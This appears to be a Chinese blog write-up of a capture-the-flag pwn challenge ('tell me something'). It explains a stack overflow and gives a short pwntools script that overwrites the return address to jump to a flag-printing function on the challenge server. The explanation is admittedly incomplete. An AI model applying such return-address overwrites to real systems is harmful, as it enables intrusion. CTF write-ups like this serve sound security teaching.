这道题跟xman-level0类似,主要一个坑点是没有rbp,不需要填充字节。至于为啥,我也还不懂,以后看到相关知识点再补充。
1.主要是覆盖返回地址,跳转到good_game函数,然后执行就可以获取到flag.txt的内容,最后打印出来即可。
2.具体代码如下:
# coding:utf-8
from pwn import *
# there is no rbp!!
context(os='linux',arch='amd64')
sh = remote('pwn.jarvisoj.com',9876)
elf = ELF('./guestbook')
game_addr = elf.symbols['good_game']
payload = 'a' * (0x80 + 0x8) + p64(game_addr)
sh.recvuntil('message:\n')
sh.sendline(payload)
print sh.recvall()
sh.close()
这道题跟xman-level0类似,主要一个坑点是没有rbp,不需要填充字节。至于为啥,我也还不懂,以后看到相关知...
The world that tell me is not true Something is difficult...
Tell me about something really exciting you have done in ...
Let me tell you something. There is no nobility in povert...
Let me tell you something. There is no nobility in povert...
brief introduction Can you tell me something about yourse...
lesson 48 did you want to tell me something? Why did the ...
先检查一下防护机制,发现至开启了NX,堆栈不可执行 简单执行一下,发现是让我们输入一串字符串,然后返回一句话 用 ...
Could you tell me something about Mid-Autumn Festival? I ...
First of all, let me tell you something about my English....
本文标题:tell me something
本文链接:https://www.haomeiwen.com/subject/hdxcgxtx.html
网友评论